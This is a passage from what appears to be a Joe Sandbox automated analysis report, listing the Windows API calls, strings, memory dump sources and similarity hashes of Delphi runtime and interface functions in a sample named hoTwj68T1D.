VirtualFree.KERNEL32(?,00000000,00008000,000A25BC,00000000,00401B48), ref: 00401ACE
LocalFree.KERNEL32(000A24AE,?,00000000,00008000,000A25BC,00000000,00401B48), ref: 00401B0D
RtlLeaveCriticalSection.KERNEL32(\$,00401B4F), ref: 00401B38
RtlDeleteCriticalSection.KERNEL32(\$,00401B4F), ref: 00401B42

Strings

\$, xrefs: 00401A98, 00401B33, 00401B3D

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: \$
API String ID: 3782394904-2346321534
Opcode ID: e5b1556ccff91c4fee3f752709956610c3b22686f562f24a9a3a79023585c9d3
Instruction ID: 1a659c69aa8e4b139b5fe8978984681d4a12d8fe90b1a1d51489928148f9df5c
Opcode Fuzzy Hash: e5b1556ccff91c4fee3f752709956610c3b22686f562f24a9a3a79023585c9d3
Instruction Fuzzy Hash: BF119A707402405BE711AB65AC82B563FA5B75A708F44803BF600ABAF2D77CA850C62E

Function 0041A6BC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 0041A6C1
GlobalAddAtomA.KERNEL32(00000000), ref: 0041A6E2
GetCurrentThreadId.KERNEL32 ref: 0041A6FD
GlobalAddAtomA.KERNEL32(00000000), ref: 0041A71E

Part of subcall function 00425A0C: 73E9A570.USER32(00000000), ref: 00425A62
Part of subcall function 00425A0C: EnumFontsA.GDI32(00000000,00000000,Function_000259AC,?,00000000), ref: 00425A75
Part of subcall function 00425A0C: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,Function_000259AC,?,00000000), ref: 00425A7D
Part of subcall function 00425A0C: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,Function_000259AC,?,00000000), ref: 00425A88

Part of subcall function 00425F40: LoadIconA.USER32(00400000,MAINICON), ref: 00425FD0
Part of subcall function 00425F40: GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00425FFD
Part of subcall function 00425F40: OemToCharA.USER32(?,?), ref: 00426010
Part of subcall function 00425F40: CharLowerA.USER32(?,00400000,?,00000100), ref: 00426050

Part of subcall function 004219EC: GetVersion.KERNEL32(00000000,00421CA9,00000000,0042FEB4), ref: 004219FA
Part of subcall function 004219EC: SetErrorMode.KERNEL32(00008000,00000000,00421CA9,00000000,0042FEB4), ref: 00421A16
Part of subcall function 004219EC: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,00000000,00421CA9,00000000,0042FEB4), ref: 00421A22
Part of subcall function 004219EC: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,00000000,00421CA9,00000000,0042FEB4), ref: 00421A30
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dRegister), ref: 00421A60
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dUnregister), ref: 00421A89
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dSubclassCtl), ref: 00421A9E
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dSubclassDlgEx), ref: 00421AB3
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dDlgFramePaint), ref: 00421AC8
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dCtlColorEx), ref: 00421ADD
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dAutoSubclass), ref: 00421AF2
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3dUnAutoSubclass), ref: 00421B07
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,Ctl3DColorChange), ref: 00421B1C
Part of subcall function 004219EC: GetProcAddress.KERNEL32(00000000,BtnWndProc3d), ref: 00421B31

Strings

ControlOfs%.8X%.8X, xrefs: 0041A70F
+, xrefs: 0041A735, 0041A73F
Delphi%.8X, xrefs: 0041A6D3

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X$+
API String ID: 1580766901-3070401535
Opcode ID: f2530ae9f3844d581f6204516d695aa41dac8dc8f1f7197e661f6b58dd0586de
Instruction ID: bc3bf4172e3f4f980bc4c1e67d5136c46a7991a329c8897674038b7cce140702
Opcode Fuzzy Hash: f2530ae9f3844d581f6204516d695aa41dac8dc8f1f7197e661f6b58dd0586de
Instruction Fuzzy Hash: 561181B06192405AD740EF79984274A3BE4AB9530CF84843FF4449B3A1DB3D8954CB1F

Function 00414708 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(l+), ref: 0041471C
GetCursor.USER32(0000FFF0,004147F9,00000000,00414803), ref: 00414721

Part of subcall function 00414318: SetCapture.USER32(00000000,Function_0001436C,000A2B1E,?,00414749), ref: 00414327

GetDesktopWindow.USER32 ref: 00414766

Part of subcall function 0041A098: ShowCursor.USER32(00000000,?,00000000,00000000,?,?,?,004146BD,?,?,?,?,?,004143B7,00000000,004143CA), ref: 0041A0E5

Strings

z+, xrefs: 00414760
:+, xrefs: 00414712
l+, xrefs: 00414717, 0041476D, 00414786
^+, xrefs: 00414749

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Cursor$CaptureDesktopShowWindow
String ID: :+$^+$l+$z+
API String ID: 902030098-561445086
Opcode ID: 0afd63974e16a3bada95198e716b5692bc7562a877f840f2250d524f34336f65
Instruction ID: 42f3842f093c766bf5d92f6290105e69dfa9533f8b2cd7d72880aaf6aaa45514
Opcode Fuzzy Hash: 0afd63974e16a3bada95198e716b5692bc7562a877f840f2250d524f34336f65
Instruction Fuzzy Hash: 2601A4B0E40242AFC349EB69E885B993FE1A74B305F14407BA064D72B2DB3C4884CF0D

Function 00425794 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 004257E8
GetCapture.USER32 ref: 004257F7
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004257FD
ReleaseCapture.USER32 ref: 00425802
GetActiveWindow.USER32 ref: 00425811
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00425890
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004258F4
GetActiveWindow.USER32 ref: 00425903

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 5ff46e127c744f93d1d514becea57e81e42f81a321ae14361241e6ea5cb162c7
Instruction ID: 8c5e141c6c8d7fa91ea200d262aa84814cca6308118dcb8ea05cb4c0144ad9f7
Opcode Fuzzy Hash: 5ff46e127c744f93d1d514becea57e81e42f81a321ae14361241e6ea5cb162c7
Instruction Fuzzy Hash: 6F414170B00648EFD710EB69D982B9E77F5EF48314FA440BAE404AB292D7789E50DF19

Function 0042B41C Relevance: 12.1, APIs: 8, Instructions: 62COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000), ref: 0042B426
GetTextMetricsA.GDI32(00000000), ref: 0042B42F

Part of subcall function 0041BAC8: CreateFontIndirectA.GDI32(?), ref: 0041BB87

SelectObject.GDI32(00000000,00000000), ref: 0042B43E
GetTextMetricsA.GDI32(00000000,?), ref: 0042B44B
SelectObject.GDI32(00000000,00000000), ref: 0042B452
73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042B45A
GetSystemMetrics.USER32(00000006), ref: 0042B47F
GetSystemMetrics.USER32(00000006), ref: 0042B499

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
String ID:
API String ID: 361401722-0
Opcode ID: 6aed69d8d993d64fff41f00dc55d0df37198ce1a3a5f0f75de909166cee268b6
Instruction ID: 6b1a0c7c75c9f52efe2a572cb7ddd16e980050ccd452709f443f39a4b689c082
Opcode Fuzzy Hash: 6aed69d8d993d64fff41f00dc55d0df37198ce1a3a5f0f75de909166cee268b6
Instruction Fuzzy Hash: A401C8917007507AE710B67A9CC2F6B56C8DF44358F44053BF645DA3D3D66C9C408BA9

Function 00411C94 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,00411E99), ref: 00411D2C
InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411DEA

Part of subcall function 0041204C: CreatePopupMenu.USER32 ref: 00412066

InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411E76

Part of subcall function 0041204C: CreateMenu.USER32 ref: 00412070

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00411E5D

Strings

,, xrefs: 00411D3F
?, xrefs: 00411D46

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Menu$Insert$Create$ItemPopupVersion
String ID: ,$?
API String ID: 2359071979-2308483597
Opcode ID: 11b27f4d1e9e3ee14afaa066bc76de342960b0bb816b7254a0b3b13685f9cad5
Instruction ID: 414a2bf2f2a80aeb7e7668940989092b696f22cd69fef88a869de3d4b0e83d94
Opcode Fuzzy Hash: 11b27f4d1e9e3ee14afaa066bc76de342960b0bb816b7254a0b3b13685f9cad5
Instruction Fuzzy Hash: 0651D570A002449BDB10EF7ADD815EA7BF9AB09300B1545BBFA44E73A6D7389D41CB58

Function 0041D6C3 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041D788
GetObjectA.GDI32(?,00000018,?), ref: 0041D797
GetBitmapBits.GDI32(?,?,?), ref: 0041D7E8
GetBitmapBits.GDI32(?,?,?), ref: 0041D7F6
DeleteObject.GDI32(?), ref: 0041D7FF
DeleteObject.GDI32(?), ref: 0041D808
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041D825

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: b036a172f2a59c8c7cf6954ffa2111d549d85840b01030fbfbf612cb32b00d04
Instruction ID: c7f47422864b9a5da5a1598b9bdf6dacb2d4600ba43987d5aab39bec4501188b
Opcode Fuzzy Hash: b036a172f2a59c8c7cf6954ffa2111d549d85840b01030fbfbf612cb32b00d04
Instruction Fuzzy Hash: 4851F671E00619AFCF10DFA9C8819EEB7F9EB49314B10452AF914EB391D638AD41CB64

Function 0041F82C Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041F852
73EA4620.GDI32(00000000,00000026), ref: 0041F871
73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041F8D7
73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041F8E6
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041F950
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041F98E
73E98830.GDI32(?,?,00000001,0041F9C0,00000000,00000026), ref: 0041F9B3

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Stretch$E98830$A4620BitsE922Mode
String ID:
API String ID: 4209919087-0
Opcode ID: a602836cb5ae5afbe0adc862197693fa6711e697120ba80c40bddd19fc1cfe32
Instruction ID: 05127c42db65b29203c7352d9256ce68198217fbda3e5b8f3dac13f849e268c3
Opcode Fuzzy Hash: a602836cb5ae5afbe0adc862197693fa6711e697120ba80c40bddd19fc1cfe32
Instruction Fuzzy Hash: D0512F70610600AFDB14EFA9C985F9AB7E8EF08304F1444AAB549DB292C778ED85CB58

Function 00425F40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00425FD0
GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00425FFD
OemToCharA.USER32(?,?), ref: 00426010
CharLowerA.USER32(?,00400000,?,00000100), ref: 00426050

Strings

2, xrefs: 00425F9E
MAINICON, xrefs: 00425FC5

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 26aeb1fb6f9f95230d13e1baf85d0dbd7c0fdc3a3815ae7d2fd2caf12c2caafa
Instruction ID: 12dd15589d772685ff717f44f3c8e7628054a29ea2e94bc7f8fb1f72681d9396
Opcode Fuzzy Hash: 26aeb1fb6f9f95230d13e1baf85d0dbd7c0fdc3a3815ae7d2fd2caf12c2caafa
Instruction Fuzzy Hash: 5D31C071A042549ADB10EF39D8C57C97BE8AF15308F4440BAE844DB293DBBED98CCB59

Function 00404439 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 73windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004044D1
ExitProcess.KERNEL32 ref: 00404519

Strings

Runtime error at 00000000, xrefs: 004044CA, 004044DD
($, xrefs: 00404534
>$, xrefs: 00404505, 00404523
Error, xrefs: 004044C5

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
